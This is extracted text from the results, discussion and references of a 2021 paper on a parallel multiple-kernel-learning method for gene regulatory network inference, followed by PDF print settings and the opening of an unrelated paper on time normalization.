computational cost and enhanced inference accuracy when dealing with complex and large-scale inference tasks. Initially the algorithm is run in sequential mode for all the organisms for a set of 32 TFs, and later on in parallel mode on 8 and 16 CPUs. Performance metrics for all the datasets are plotted in Fig. 3. A brief description of these important performance metrics is given below: SPEEDUP We calculate speedup as a measure of relative performance of executing our algorithm in sequential and parallel processing environments. The speed up is calculated as under:- SðjÞ ¼ Tð1Þ=TðjÞ (4) Where S(j) is the speedup on j processors, T(1) is the time it takes on a single processor and T(j) is the time program takes on j processors. EFFICIENCY Efficiency is defined as the ratio of speedup to the number of processing elements (j CPUs in our case). It measures the utilization of the computation resources for a fraction of time. Ideally in parallel system, speedup is equal to j and efficiency is equal to 1. However, in Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 11/20 https://github.com/waninisar/MKL-GRNI http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ practice, speedup is less than j and efficiency is between zero and one, depending on the effectiveness with which the processing elements are utilized. We calculate efficiency E(j) on j processors as given below: EðjÞ ¼ SðjÞ=j (5) REDUNDANCY Redundancy is computed as the ratio between number of operations executed in parallel and sequential modes. It measures the required increase in the number of computations when the algorithm is run on multiple processors. RðjÞ ¼ OðjÞ=Oð1Þ (6) QUALITY Quality measures the relevance of using parallel computation and is defined as the ratio between the product of speedup and efficiency to that of redundancy. QðjÞ ¼ SðjÞxEðjÞ=RðjÞ (7) Figure 3 Performance metrics for parallel MKL-GRNI algorithm: (A) Speedup, (B) Efficiency, (C) Redundancy, (D) Quality. Full-size DOI: 10.7717/peerj-cs.363/fig-3 Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 12/20 http://dx.doi.org/10.7717/peerj-cs.363/fig-3 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ It is evident from the Fig. 1 that there is marked increase in the speedup as we move from a sequential (single CPU) to parallel execution (i.e., 8 and 16 CPUs). For an E. coli genome with a sample size of 500 and 32 TFs used for inference, the algorithm shows a sharp speedup as we move from sequential execution to parallel execution on 8 processors, however when the number of processors is increased to 16, there is marginal increase in speedup for E. coli. On the other hand, there is considerable increase in speedup recorded for 8 and 16 processors on higher genomes, such as S. cerevisiae and Homo sapiens, suggesting an increase in the capacity of the parallel algorithm to reduce the execution times. To assess the resource utilization using our parallel approach, the efficiency metric shows considerable drop in utilization of compute resources for all the three datasets, because only a section of algorithm runs in parallel. This can be inferred from the computed redundancy for sequential and parallel executions. The redundancy plot shows slight increase in terms of the computational cost incurred when running our computational problem in parallel, thereby suggesting less computational overhead as we switch from sequential to parallel mode of execution. To evaluate the relevance of parallel execution to our problem, we calculate quality metric for all the three datasets. From the barplots we can observe that parallel algorithms are less relevant when applied to smaller genomes as is evident in case of E. coli. But there is steady improvement in quality metric as move from S. cerevisiae to Homo sapiens with relevance indicator high when yeast dataset is run on 8 processors and human dataset on 16 processors. These improvements in speedup and quality metrics when running the algorithm in parallel provides us with a framework to work with more complex datasets and organisms with large genome sizes to infer very large scale GRNs using a supervised approach. To assess the inference potential of this supervised method we compare the proposed approach with other methods that infer gene interactions from single and integrated datasets. Initially we apply MKL-GRNI to DREAM5 E.coli data, we performed a 10-fold cross-validation to make sure that model is trained on all the known regulations. At each cross-validation step, important performance metrics such as precision, recall and F1 score are recorded and then averaged for the whole cross-validation procedure. We then compared our network inference method with inference methods that predict TF-target gene regulations, such as CLR (Faith et al., 2007) and SIRENE (Mordelet & Vert, 2008). The results are recorded in Table 2. After running all the inference procedures, it is observed that the average precision , recall and F1 metrics generated by running MKL-GRNI is quite higher than those generated by other comparable methods. The improvement with MKL-GRNI can be attributed to the additional biological knowledge in the form of protein-protein interactions between E.coli genes to aid in the inference process. To test the proposed method on integrated data, We perform a 10 fold cross-validation procedure on the input data. In this experiment, the known target genes of each organism as depicted in Table 1 are split into training and test sets. The model is trained on the features from the training set, and the network inference is performed between the genes in the test set, important evaluation metrics, such as Precision, Recall and F1 scores are recorded for each iteration and averaged across cross-validation runs. Table 3 summarizes Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 13/20 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ these metric for varying genome and sample size for human breast cancer dataset and Table 4 contains results for all the three genomes. It is evident from these results that the MKL-GRNI algorithm scales well for higher genomes sizes. These metrics highlight the learning and inference potential of MKL. Looking at Table 3 we observe an average recall of 80% and an average precision of 58% with an average F1 measure of 65% for a genome size of 5,000 and sample size of 100, with an increase in these metrics as we increase the sample size to 500 and 1,000 respectively. However, as we start increasing the size of the genome, these metrics start a gradual decline for smaller sample size and again show a marginal increase as we increase the sample size for a fixed genome size. Although there is no direct rule of determining the number of samples corresponding to the size of the genome in omics studies, the improvements in precision, recall and F1 measures suggests an improvement in learning and inference potential of MKL algorithm with an increase in the number of samples. Also the tabulated metrics for all the three genomes in Table 4 show a considerable decline Table 2 Average precision, recall and F1 measures for various inference methods. Method Average precision Average recall Average F1 score CLR 0.275 0.55 0.36 SIRENE 0.445 0.73 0.55 MKL-GRNI 0.46 0.97 0.62 Table 3 Precision, recall and F1 measure recorded for different combination of genome and sample sizes for Breast cancer data. No. of genes No. of samples Average recall Average Precision Average F1 measure 5,000 100 0.8005 0.5817 0.6582 5,000 500 0.8005 0.6169 0.6848 5,000 1,000 0.8354 0.6347 0.6968 10,000 100 0.7350 0.4406 0.5509 10,000 500 0.7660 0.4537 0.5699 10,000 1,000 0.7860 0.4937 0.6065 19,201 100 0.7499 0.3746 0.4996 19,201 500 0.7444 0.3893 0.5112 19,201 1,000 0.7499 0.4246 0.5422 Table 4 Precision, recall and F1 measures averaged across cross-validation runs for complete genomes. Organism No. of genes No. of samples Avg. precision Avg. recall Avg. F1 measure E. coli 4,297 802 0.46 0.97 0.62 S. cerevisiae 5,657 536 0.42 0.84 0.56 Homo sapiens 19,201 1,012 0.37 0.73 0.49 Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 14/20 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ in the evaluation metrics as we move from smaller to larger genomes, suggesting a decrease in inference potential of the algorithm for larger datasets. The possible decline in the performance metrics can be attributed to increase in the genome size as we move from simple prokaryotic to more complex eukaryotic genomes. This increase in the genome sizes versus the sample size leads to curse of dimensionality and therefore making difficult to learn properly from skewed datasets. We also compare our MKL-GRNI with a recently developed Integrative random forest for gene regulatory network inference (iRafNet) (Petralia et al., 2015). We select DREAM5 datasets of E. coli and S. cerevisiae and integrate PPI and gene expression data from both datasets. For MKL we build Gaussian and diffusion kernels from expression and PPI data. For iRafNet , the expression data serves as the main data and the PPI data is used as support data. Sampling weights are then derived from PPI data by building a diffusion kernel as K = eH where H is a graph laplacian for PPI data. Sampling weights from K are derived as WPPIi, j = K(i, j) that is, the element K (i,j). The sampling weights thus obtained are then integrated with main data set (i.e., gene expression data). Putative regulatory links are then predicted using importance scores generated using the iRafNet R package. The AUC and AUPR scores obtained using iRafNet and MKL-GRNI are listed in Table 5. The AUC and AUPR scores of MKL-GRNI thus obtained are comparable to iRafNet for both datasets. However, iRafNet reports a lower AUC and higher AUPR scores compared to MKL-GRNI when run on E. coli data. But once we move towards a higher genome size, these scores start dropping marginally for both iRafNet and MKL-GRNI approaches. The slight higher AUC scores in case of MKL-GRNI can be attributed to some extent to the skewed class label distribution where in negative labels far outnumber the positive ones because of limited known regulations. This class imbalance leads to higher predictive accuracy (AUC) but lower precision-recall scores (AUPR). On the other hand regression based GRN inference techniques have been reported to perform well for smaller genomes with GENIE3 (Huynh-Thu et al., 2010) being a start performer in DREAM5 network inference challenges. The higher AUPR generated by iRafNet in case of E. coli can be attributed to the way potential regulators are sampled using prior information from sampling weights (PPI), therefore decreasing false positives and increasing precision and recall. But for higher genomes (i.e, yeast in our case) the performance of both approaches begins to fall as reported by (Mordelet & Vert, 2008). Present implementation of iRafNet does not provide the ability to run the random forest algorithm in parallel. Therefore, using iRafNet for GRNI of higher genomes can incur huge computational cost by running thousands of decision trees in sequential mode. Table 5 AUC and AUPR scores for E. coli and S. cerevisiae using iRafNet and MKL-GRNI. Datasets iRafNet MKL-GRNI AUC AUPR AUC AUPR E. coli 0.901 0.552 0.925 0.44 S. cerevisiae 0.833 0.39 0.89 0.42 Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 15/20 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ Since our main motive in this study is to parallelize the inference algorithm for large-scale GRNI, the higher speedup and higher quality provided by running MLK-GRNI in parallel can be used as a trade-off for slightly lower AUPR compared to iRafNet run in sequential mode with marginally higher AUPR scores. DISCUSSION AND CONCLUSION Here we present a scalable and parallel approach to GRN inference using MKL as integration and supervised learning framework. The algorithm has been implemented in Python using Python interface to MKL provided by shogun machine learning toolbox (Sonnenburg et al., 2010). The ability of kernel methods in pattern discovery and learning from genomic data fusion of multi-omics data using MKL has already been demonstrated in a number of inference studies. Our focus here is to explore the scalability option for large-scale GRN inference in a supervised machine learning setting, besides assessing the inference potential across different genomes. The approach undertaken can be considered as a parallel extension to SIRENE (Mordelet & Vert, 2008). Although SIRENE performs better than other unsupervised and information theoretic based inference methods as reported by (Mordelet & Vert, 2008). However, it lacks the ability to learn from heterogeneous genomic datasets that can provide essential and complementary information for GRN inference. Another limitation is the sequential execution of the TF-specific classification problems that incur the huge cost in terms of execution times as we move from E. coli genomes to more complex and large genomes of mice and humans. Therefore to facilitate very large scale GRN inference using supervised learning approach, we use the concept of decomposing the initial problems of learning GRN into many subproblems, where each subproblem is aimed to infer a GRN for a specific TF. Our algorithm distributes all such learning problems to different processors on a multi-processor hardware platform and dispatches them for simultaneous execution, thereby reducing the execution time of the inference process substantially. The results from each execution are written to a shared queue object, once all the child processes complete their execution, the queue object is iterated to build a single output matrix for genome-scale GRN inference. We also assess the inference potential of our MKL based parallel GRN inference approach by computing essential evaluation metrics for machine learning based approaches. A quick survey of scientific literature on GRN inference methods will ensure that the results obtained by our approach are comparable to other state-of-the-art methods in this domain and some cases better than inference methods that employ only gene expression data (e.g., CLR, ARACNE, SIRENE, etc. ). A drawback of our approach is that only TFs with known targets can be used to train the inference model. Also, the performance of the algorithm tends to decrease if the model training is carried out using TFs with few known targets, leading to a bias in favor of TFs with many known neighbors (i.e., hubs) and is less likely to predict new associations for TFs with very few neighbors. Besides, we are not able to identify new TFs among the newly learned interaction, nor the model can predict whether a given gene is upregulated or downregulated by a particular TF. Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 16/20 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ Therefore additional work is needed to improve the efficiency of the parallel algorithm and the inference potential of the MKL-GRNI. In our current implementation, we integrate only two datasets for GRNI, therefore leaving the scope to use more omics sources that can be integrated for improved performance of the inference model. Also, the MKL framework provides a mechanism to weigh the contribution of individual datasets that can be used to select informative datasets for integration. Further, we do not identify TFs from the predicted target genes and can be considered in future extension to this work. Besides, novel techniques to choose negative examples for training our parallel MKL-GRNI model can be incorporated to decrease the number of false positives and improve the overall precision/recall scores for genomes of higher organisms. ADDITIONAL INFORMATION AND DECLARATIONS Funding Nisar Wani is supported by Teacher Fellowship of University Grants Commission, Ministry of Human Resources Development, Govt. of India vide letter No. F.B No. 27-(TF-45)/2015 under Faculty Development Programme. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: University Grants Commission, Ministry of Human Resources Development, Govt. of India: F.B No. 27-(TF-45)/2015. Competing Interests The authors declare that they have no competing interests. Author Contributions � Nisar Wani conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Khalid Raza conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The code is available at GitHub: https://github.com/waninisar/MKL-GRNI. REFERENCES Albert R. 2007. Network inference, analysis, and modeling in systems biology. Plant Cell 19(11):3327–3338 DOI 10.1105/tpc.107.054700. Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 17/20 https://github.com/waninisar/MKL-GRNI http://dx.doi.org/10.1105/tpc.107.054700 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ Alioscha-Perez M, Oveneke MC, Sahli H. 2019. Svrg-mkl: a fast and scalable multiple kernel learning solution for features combination in multi-class classification problems. IEEE Transactions on Neural Networks and Learning Systems 31(5):1710–1723 DOI 10.1109/TNNLS.2019.2922123. Ben-Hur A, Noble WS. 2005. Kernel methods for predicting protein-protein interactions. Bioinformatics 21(Suppl. 1):i38–i46 DOI 10.1093/bioinformatics/bti1016. Butte AJ, Kohane IS. 1999. Mutual information relevance networks: functional genomic clustering using pairwise entropy measurements. In: Biocomputing 2000. Singapore: World Scientific, 418–429. Chen Z-Y, Fan Z-P. 2014. Parallel multiple kernel learning: a hybrid alternating direction method of multipliers. Knowledge and Information Systems 40(3):673–696 DOI 10.1007/s10115-013-0655-5. Cichonska A, Pahikkala T, Szedmak S, Julkunen H, Airola A, Heinonen M, Aittokallio T, Rousu J. 2018. Learning with multiple pairwise kernels for drug bioactivity prediction. Bioinformatics 34(13):i509–i518 DOI 10.1093/bioinformatics/bty277. ENCODE Project Consortium. 2004. The ENCODE (ENCyclopedia Of DNA Elements) Project. Science 306(5696):636–640 DOI 10.1126/science.1105136. Faith JJ, Hayete B, Thaden JT, Mogno I, Wierzbowski J, Cottarel G, Kasif S, Collins JJ, Gardner TS. 2007. Large-scale mapping and validation of escherichia coli transcriptional regulation from a compendium of expression profiles. PLOS Biology 5(1):e8 DOI 10.1371/journal.pbio.0050008. Han H, Shim H, Shin D, Shim JE, Ko Y, Shin J, Kim H, Cho A, Kim E, Lee T, Kim H, Kim K, Yang S, Bae D, Yun A, Kim S, Kim CY, Cho HJ, Kang B, Shin S, Lee I. 2015. TRRUST: a reference database of human transcriptional regulatory interactions. Scientific Reports 5(1):11432 DOI 10.1038/srep11432. Hecker M, Lambeck S, Toepfer S, Van Someren E, Guthke R. 2009. Gene regulatory network inference: data integration in dynamic models: a review. Biosystems 96(1):86–103 DOI 10.1016/j.biosystems.2008.12.004. Huynh-Thu VA, Irrthum A, Wehenkel L, Geurts P. 2010. Inferring regulatory networks from expression data using tree-based methods. PLOS ONE 5(9):e12776 DOI 10.1371/journal.pone.0012776. Jiang C, Xuan Z, Zhao F, Zhang MQ. 2007. Tred: a transcriptional regulatory element database, new entries and other development. Nucleic Acids Research 35(Suppl. 1):D137–D140 DOI 10.1093/nar/gkl1041. Kondor RI, Lafferty J. 2002. Diffusion kernels on graphs and other discrete structures. Proceedings of the 19th International Conference on Machine Learning 2002:315–322. Lanckriet GR, De Bie T, Cristianini N, Jordan MI, Noble WS. 2003. Kernel-based data fusion and its application to protein function prediction in yeast. In: Biocomputing 2004. Singapore: World Scientific, 300–311. Lanckriet GR, De Bie T, Cristianini N, Jordan MI, Noble WS. 2004. A statistical framework for genomic data fusion. Bioinformatics 20(16):2626–2635 DOI 10.1093/bioinformatics/bth294. Lee TI, Rinaldi NJ, Robert F, Odom DT, Bar-Joseph Z, Gerber GK, Hannett NM, Harbison CT, Thompson CM, Simon I, Zeitlinger J, Jennings EG, Murray HL, Gordon DB, Ren B, Wyrick JJ, Tagne J-B, Volkert TL, Fraenkel E, Gifford DK, Young RA. 2002. Transcriptional regulatory networks in saccharomyces cerevisiae. Science 298(5594):799–804 DOI 10.1126/science.1075090. Marbach D, Costello JC, Küffner R, Vega NM, Prill RJ, Camacho DM, Allison KR, Consortium D, Kellis M, Collins JJ, Stolovitzky G. 2012. Wisdom of crowds for robust gene network inference. Nature Methods 9(8):796. Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 18/20 http://dx.doi.org/10.1109/TNNLS.2019.2922123 http://dx.doi.org/10.1093/bioinformatics/bti1016 http://dx.doi.org/10.1007/s10115-013-0655-5 http://dx.doi.org/10.1093/bioinformatics/bty277 http://dx.doi.org/10.1126/science.1105136 http://dx.doi.org/10.1371/journal.pbio.0050008 http://dx.doi.org/10.1038/srep11432 http://dx.doi.org/10.1016/j.biosystems.2008.12.004 http://dx.doi.org/10.1371/journal.pone.0012776 http://dx.doi.org/10.1093/nar/gkl1041 http://dx.doi.org/10.1093/bioinformatics/bth294 http://dx.doi.org/10.1126/science.1075090 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ Margolin AA, Nemenman I, Basso K, Wiggins C, Stolovitzky G, Dalla Favera R, Califano A. 2006. Aracne: an algorithm for the reconstruction of gene regulatory networks in a mammalian cellular context. BMC Bioinformatics 7(1):S7 DOI 10.1186/1471-2105-7-S1-S7. Mordelet F, Vert J-P. 2008. SIRENE: supervised inference of regulatory networks. Bioinformatics 24(16):i76–i82 DOI 10.1093/bioinformatics/btn273. Nascimento AC, Prudêncio RB, Costa IG. 2016. A multiple kernel learning algorithm for drug- target interaction prediction. BMC Bioinformatics 17(1):46 DOI 10.1186/s12859-016-0890-3. Pavlidis P, Weston J, Cai J, Noble WS. 2002. Learning gene functional classifications from multiple data types. Journal of Computational Biology 9(2):401–411 DOI 10.1089/10665270252935539. Petralia F, Wang P, Yang J, Tu Z. 2015. Integrative random forest for gene regulatory network inference. Bioinformatics 31(12):i197–i205 DOI 10.1093/bioinformatics/btv268. Raza K, Alam M. 2016. Recurrent neural network based hybrid model for reconstructing gene regulatory network. Computational Biology and Chemistry 64:322–334 DOI 10.1016/j.compbiolchem.2016.08.002. Remli MA, Mohamad MS, Deris S, Samah AA, Omatu S, Corchado JM. 2019. Cooperative enhanced scatter search with opposition-based learning schemes for parameter estimation in high dimensional kinetic models of biological systems. Expert Systems with Applications 116:131–146 DOI 10.1016/j.eswa.2018.09.020. Scholkopf B, Smola AJ. 2001. Learning with kernels: support vector machines, regularization, optimization, and beyond. Cambridge: MIT Press. Seoane JA, Day IN, Gaunt TR, Campbell C. 2013. A pathway-based data integration framework for prediction of disease progression. Bioinformatics 30(6):838–845 DOI 10.1093/bioinformatics/btt610. Shawe-Taylor J, Cristianini N. 2004. Kernel methods for pattern analysis. Cambridge: Cambridge University Press. Sonnenburg S, Henschel S, Widmer C, Behr J, Zien A, Bona Fd, Binder A, Gehl C, Franc V. 2010. The shogun machine learning toolbox. Journal of Machine Learning Research 11:1799–1802. Sonnenburg S, Rätsch G, Schäfer C, Schölkopf B. 2006. Large scale multiple kernel learning. Journal of Machine Learning Research 7:1531–1565. Speicher NK, Pfeifer N. 2015. Integrating different data types by regularized unsupervised multiple kernel learning with application to cancer subtype discovery. Bioinformatics 31(12):i268–i275 DOI 10.1093/bioinformatics/btv244. Szklarczyk D, Franceschini A, Kuhn M, Simonovic M, Roth A, Minguez P, Doerks T, Stark M, Muller J, Bork P, Jensen LJ, Mering C. 2011. The STRING database in 2011: functional interaction networks of proteins, globally integrated and scored. Nucleic Acids Research 39(Suppl. 1):D561–D568 DOI 10.1093/nar/gkq973. Tomczak K, Czerwińska P, Wiznerowicz M. 2015. The cancer genome atlas (tcga): an immeasurable source of knowledge. Contemporary Oncology 19(1A):A68. Van Laarhoven T, Nabuurs SB, Marchiori E. 2011. Gaussian interaction profile kernels for predicting drug-target interaction. Bioinformatics 27(21):3036–3043 DOI 10.1093/bioinformatics/btr500. Wani N, Raza K. 2018. Multiple kernel-learning approach for medical image analysis. In: Soft Computing Based Medical Image Analysis. Amsterdam: Elsevier, 31–47. Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 19/20 http://dx.doi.org/10.1186/1471-2105-7-S1-S7 http://dx.doi.org/10.1093/bioinformatics/btn273 http://dx.doi.org/10.1186/s12859-016-0890-3 http://dx.doi.org/10.1089/10665270252935539 http://dx.doi.org/10.1093/bioinformatics/btv268 http://dx.doi.org/10.1016/j.compbiolchem.2016.08.002 http://dx.doi.org/10.1016/j.eswa.2018.09.020 http://dx.doi.org/10.1093/bioinformatics/btt610 http://dx.doi.org/10.1093/bioinformatics/btv244 http://dx.doi.org/10.1093/nar/gkq973 http://dx.doi.org/10.1093/bioinformatics/btr500 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ Wani N, Raza K. 2019a. Integrative approaches to reconstruct regulatory networks from multi-omics data: a review of state-of-the-art methods. Computational Biology and Chemistry 83:107120 DOI 10.1016/j.compbiolchem.2019.107120. Wani N, Raza K. 2019b. iMTF-GRN: integrative matrix tri-factorization for inference of gene regulatory networks. IEEE Access 7:126154–126163 DOI 10.1109/ACCESS.2019.2936794. Yamanishi Y, Vert J-P, Kanehisa M. 2004. Protein network inference from multiple genomic data: a supervised approach. Bioinformatics 20(Suppl. 1):i363–i370 DOI 10.1093/bioinformatics/bth910. Yan S, Xu D, Zhang B, Zhang H-J, Yang Q, Lin S. 2007. Graph embedding and extensions: a general framework for dimensionality reduction. IEEE Transactions on Pattern Analysis and Machine Intelligence 29(1):40–51 DOI 10.1109/TPAMI.2007.250598. Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 20/20 http://dx.doi.org/10.1016/j.compbiolchem.2019.107120 http://dx.doi.org/10.1109/ACCESS.2019.2936794 http://dx.doi.org/10.1093/bioinformatics/bth910 http://dx.doi.org/10.1109/TPAMI.2007.250598 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.363 MKL-GRNI: A parallel multiple kernel learning approach for supervised inference of large-scale gene regulatory networks Introduction Related literature Materials and Methods Results Speedup Efficiency Redundancy Quality Discussion and Conclusion References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS /CHT /DAN /DEU /ESP /FRA /ITA /JPN /KOR /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR /PTB /SUO /SVE /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_2qq6wxmizbfornkrysxkp6vpqu ---- From Characters to Time Intervals: New Paradigms for Evaluation and Neural Parsing of Time Normalizations Egoitz Laparra∗ Dongfang Xu∗ Steven Bethard School of Information University of Arizona Tucson, AZ {laparra,dongfangxu9,bethard}@email.arizona.edu Abstract This paper presents the first model for time normalization trained on the SCATE corpus. In the SCATE schema, time expressions are annotated as a semantic composition of time entities. This novel schema favors machine learning approaches, as it can be viewed as a semantic parsing task. In this work, we propose a character level multi-output neural network that outperforms previous state-of-the-art built on the TimeML schema. To compare predic- tions of systems that follow both SCATE and TimeML, we present a new scoring metric for time intervals. We also apply this new metric to carry out a comparative analysis of the anno- tations of both schemes in the same corpus. 1 Introduction Time normalization is the task of translating natural language expressions of time to computer-readable forms. For example, the expression three days ago could be normalized to the formal representation 2017-08-28 in the ISO-8601 standard. As time nor- malization allows entities and events to be placed along a timeline, it is a crucial step for many informa- tion extraction tasks. Since the first shared tasks on time normalization (Verhagen et al., 2007), interest in the problem and the variety of applications have been growing. For example, Lin et al. (2015) use normal- ized timestamps from electronic medical records to contribute to patient monitoring and detect potential causes of disease. Vossen et al. (2016) identify multi- lingual occurrences of the same events in the news ∗These two authors contributed equally. by, among other steps, normalizing time-expressions in different languages with the same ISO standard. Fischer and Strötgen (2015) extract and normalize time-expressions from a large corpus of German fic- tion as the starting point of a deep study on trends and patterns of the use of dates in literature. A key consideration for time normalization sys- tems is what formal representation the time expres- sions should be normalized to. The most popular scheme for annotating normalized time expressions is ISO-TimeML (Pustejovsky et al., 2003a; Puste- jovsky et al., 2010), but it is unable to represent several important types of time expressions (e.g., a bounded set of intervals, like Saturdays since March 6) and it is not easily amenable to machine learning (the rule-based HeidelTime (Strötgen et al., 2013) still yields state-of-the-art performance). Bethard and Parker (2016) proposed an alternate scheme, Se- mantically Compositional Annotation of Time Ex- pressions (SCATE), in which times are annotated as compositional time entities (Figure 1), and suggested that this should be more amenable to machine learn- ing. However, while they constructed an annotated corpus, they did not train any automatic models on it. We present the first machine-learning models trained on the SCATE corpus of time normalizations. We make several contributions in the process: • We introduce a new evaluation metric for time normalization that can compare normalized times from different annotation schemes by mea- suring overlap of intervals on the timeline. • We use the new metric to compare SCATE and TimeML annotations on the same corpus, and confirm that SCATE covers a wider variety of 343 Transactions of the Association for Computational Linguistics, vol. 6, pp. 343–356, 2018. Action Editor: Mona Diab. Submission batch: 10/2017; Revision batch: 1/2018; Published 5/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. THIS INTERVAL REPEATING-INTERVALS DAY-OF-WEEK TYPE=SATURDAY Saturdays BETWEEN START-INTERVAL END-INTERVAL=DOC-TIME since LAST INTERVAL=DOC-TIME REPEATING-INTERVAL MONTH-OF-YEAR TYPE=MARCH 